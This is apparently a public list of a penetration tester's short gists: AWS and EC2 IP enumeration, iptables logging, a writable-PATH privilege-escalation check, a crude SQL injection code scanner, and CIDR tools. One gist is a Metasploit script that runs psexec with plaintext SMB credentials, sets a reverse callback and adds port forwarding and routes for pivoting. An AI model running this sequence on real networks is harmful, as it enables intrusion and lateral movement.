Joshua Wright joswr1ght
joswr1ght
/ youwillnotbestmejq.sh
Last active
July 29, 2021 18:54
Get Name and IP address from EC2 instances
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ aws --profile falsimentis --region us-west-1 ec2 describe-instances | jq -jr '.Reservations[] | .Instances[] | "\"", (.PublicIpAddress), "\":\"", (.Tags[] | select(.Key=="Name")|.Value),"\",\n"' | |
| "54.183.200.32":"Web Server 3", | |
| "13.56.160.248":"VPC NAT Backup", | |
| "13.57.148.101":"VPC NAT", | |
| "54.153.36.229":"Dev Webserver", | |
| "52.52.159.114":"Web Server 2", | |
| "null":"DB Server 1", | |
| "54.241.78.206":"Web Server 1", | |
| "54.219.245.27":"Web Server 4", | |
| $ cat ec2-describe-instances.json | jq -jr '.Reservations[] | .Instances[] | "\"", (.NetworkInterfaces[] | .PrivateIpAddress), "\":\"", (.Tags[] | select(.Key=="Name")|.Value),"\",\n"' |
joswr1ght
/ intermediate-forwarder.met
Created
May 21, 2021 16:36
Setup Intermediate Forwarder for Metasploit Callback
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use exploit/windows/smb/psexec | |
| set RHOST 10.10.10.10 | |
| set SMBUSER falken | |
| set SMBPASS joshua | |
| set LHOST tap0 | |
| show options | |
| exploit | |
| portfwd add -R -L 127.0.0.1 -l 4444 -p 4444 | |
| bg | |
| route add 10.10.10.20/32 1 |
joswr1ght
/ iptables-connect-logging.sh
Created
May 10, 2021 11:18
Linux server-side connection logging
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Create a chain that logs new connections: | |
| iptables -N LOGNEW | |
| iptables -A LOGNEW -j LOG --log-prefix ' INBOUND TCP ' --log-level 4 | |
| iptables -A LOGNEW -j ACCEPT | |
| # Accept packets on existing connections without any fuss: | |
| iptables -A INPUT -p tcp -m state \! --state NEW -j ACCEPT | |
| # Log incoming packets on new connections: | |
| iptables -A INPUT -p tcp -j LOGNEW -m limit --limit 100/sec | |
| # Examine logs |
joswr1ght
/ check-privesc-writable-dirs.sh
Created
March 31, 2021 14:31
Check PATH for Writable Directories for Privesc Opportunity
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| IFS=:; set -o noglob; for dir in $PATH""; do ls -ld $dir; done |
joswr1ght
/ heinous-shell-sqli-scanner.sh
Created
March 16, 2021 18:55
SQL Injection Vulnerable Code Scanning Shell Command
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This heinous command searches for SQL injection vulnerable code: | |
| # 1. Use awk to convert multiline strings into a single line | |
| # 2. Fix things up with sed to make line endings normal again | |
| # 3. Search for SQL-related statements | |
| # 4. Search for lines where there are two or more $ variable indicators | |
| # | |
| # This is a hack. Please don't let this be my legacy. | |
| # | |
| awk -F"\"" '!$NF{ print; next }{ printf("%s ", $0) }' *.php | sed 's/;/;\n/g;s/}/}\n/g' | grep -iE "select|insert|update|delete" | grep -E "\\$.*\\$" |
joswr1ght
/ extract-tlsscan-hostnames.py
Last active
March 8, 2025 20:40
Extract TLS-Scan Hostnames from Certificate Records
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # Mark Baggett @MarkBaggett graciously wrote this script. | |
| # Minor changes by Joshua Wright @joswr1ght. | |
| # Use it to retrieve host name information from the JSON output of tls-scan | |
| # (https://github.com/prbinu/tls-scan) in the subjectCN and subjectAltName | |
| # fields. | |
| import json | |
| import re | |
| import sys |
joswr1ght
/ countips.py
Last active
February 9, 2024 18:23
Read a file of network + CIDR masks, one per line; count the number of IP addresses it represents
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| def countips(netblock): | |
| cidr = int(netblock.split('/')[1]) | |
| return 2**(32 - cidr) | |
| if (len(sys.argv) != 2): | |
| print(f"Usage: {sys.argv[0]} <file with CIDR masks>") | |
| sys.exit(0) |
joswr1ght
/ targetnetworks.txt
Created
February 18, 2021 12:12
A list of netblocks with CIDR masks (the AWS us-east-1 range as of 2/17/2021)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 15.230.56.104/31 | |
| 52.93.127.163/32 | |
| 3.2.0.0/24 | |
| 15.230.137.0/24 | |
| 52.4.0.0/14 | |
| 50.16.0.0/15 | |
| 52.95.208.0/22 | |
| 52.93.127.169/32 | |
| 52.94.244.0/22 | |
| 64.252.69.0/24 |
joswr1ght
/ aws-us-east-1-iplist.sh
Created
February 16, 2021 18:57
Get AWS IP Addresses for a Specified Area
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget -qO- https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes[] | if .region == "us-east-1" then .ip_prefix else empty end' -r | head -3 |
joswr1ght
/ aws-iplist-filter-byregion.sh
Created
December 22, 2020 13:23
Get AWS IP list, filtered by region
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This isn't so much of a script as it is a placeholder for something I don't want to forget | |
| wget -qO- https://ip-ranges.amazonaws.com/ip-ranges.json | jq '.prefixes[] | if .region == "us-east-1" then .ip_prefix else empty end' -r |